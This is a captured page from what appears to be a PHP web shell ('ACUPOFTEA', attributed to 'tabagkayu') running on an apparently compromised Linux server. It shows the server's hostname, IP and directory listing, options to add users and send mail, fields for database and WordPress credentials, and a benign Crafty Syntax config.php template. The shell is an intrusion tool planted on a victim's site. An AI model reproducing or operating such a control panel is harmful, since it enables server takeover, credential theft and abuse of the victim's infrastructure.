System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
crafty
/
216.73.216.146
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.php
<?php //=========================================================================== //* -- ~~ CRAFTY SYNTAX Live Help ~~ -- * //=========================================================================== // URL: https://lupopedia.com/ EMAIL: salessyntax@gmail.com // Copyright (C) 2003-2016 Eric Gerdes (https://lupopedia.com ) // ---------------------------------------------------------------------------- // Please check https://lupopedia.com/ or REGISTER your program for updates // -------------------------------------------------------------------------- // NOTICE: Do NOT remove the copyright and/or license information any files. // doing so will automatically terminate your rights to use program. // If you change the program you MUST clause your changes and note // that the original program is CRAFTY SYNTAX Live help or you will // also be terminating your rights to use program and any segment // of it. // -------------------------------------------------------------------------- // LICENSE: // This program is free software; you can redistribute it and/or // modify it under the terms of the GNU General Public License // as published by the Free Software Foundation; // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with this program in a file named LICENSE.txt . //=========================================================================== // set this to true if false you will be re-directed to the setup page $installed=true; if(empty($_SERVER)){ $_SERVER = $HTTP_SERVER_VARS; } // if this program has not been installed and this is not the setup.php // re-direct to that page to setup database.. if( ($installed == false) && (!preg_match("/setup.php/", $_SERVER['PHP_SELF'])) ){ header("Location: setup.php",TRUE,307); exit; } // if this file has insecure permissions: if($installed==true){ $perm = @stat("config.php"); if(!(empty($perm[2]))){ if( ($perm[2] == "33279") || ($perm[2] == "33278") || ($perm[2] == "33270") ){ @chmod("config.php", 0755); $perm = @stat("config.php"); if(!(empty($perm[2]))){ if( ($perm[2] == "33279") || ($perm[2] == "33278") || ($perm[2] == "33270") ){ print "<font color=990000>You must secure this program. Insecure permissions on config.php</font>"; print "<br>While installing CSLH you might of needed to change the permissions of config.php so "; print "that it is writable by the web server. config.php no longer needs to be written to so "; print " please chmod config.php to not have write permissions for everyone. you can do this by"; print " UNCHECKING the box that reads write permissions for the file:"; print "<br><br><img src=directions2.gif>"; exit; } } } } } // dbtype either is either: // mysql - this is for Mysql support // txt-db-api - txt database support. $dbtype = 'mysql'; //database connections for MYSQL $server = '[[softdbhost]]'; $database = '[[softdb]]'; $datausername = '[[softdbuser]]'; $password = '[[softdbpass]]'; // change this to the full SERVER path to your files // on the server .. not the HTTP PATH.. for example enter in // $application_root = "/usr/local/apache/htdocs/livehelp/" // not /livehelp/ // keep ending slash. // WINDOWS would look something like: // $application_root = "D:\\virtual www customers\\craftysyntax\\livehelp_1_6\\"; $application_root = '[[softpath]]/'; // if using txt-db-api need the path to the txt databases directory $DB_DIR = '[[softpath]]/txt-database/'; // if using txt-db-api need to have the full path to the txt-db-api // you must set this property to something like /home/website/livehelp/txt-db-api/ $API_HOME_DIR = '[[softpath]]/' . 'txt-db-api/'; ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
..
DIR
-
drwxr-xr-x
2025-12-16 09:39:04
images
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
php53
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
php56
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
php71
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
php81
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
php82
DIR
-
drwxr-xr-x
2025-11-15 09:38:59
changelog.txt
text/plain
10.42 KB
-rw-r--r--
2025-11-14 07:03:36
clone.php
text/x-php
2.47 KB
-rw-r--r--
2025-11-14 07:04:36
config.php
text/x-php
4.08 KB
-rw-r--r--
2025-11-14 07:03:36
edit.php
text/x-php
4.2 KB
-rw-r--r--
2025-11-14 07:04:36
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
2 KB
-rw-r--r--
2025-11-14 07:03:36
import.php
text/x-php
3.13 KB
-rw-r--r--
2025-11-14 07:04:36
info.xml
text/html
2.35 KB
-rw-r--r--
2025-11-14 07:03:36
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
3.47 KB
-rw-r--r--
2025-11-14 07:04:36
install.xml
text/html
1.77 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
2.22 KB
-rw-r--r--
2025-11-14 07:04:36
upgrade.php
text/x-php
3.77 KB
-rw-r--r--
2025-11-14 07:04:36
upgrade.xml
text/plain
292 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - accounting.gulfstore-gcc.com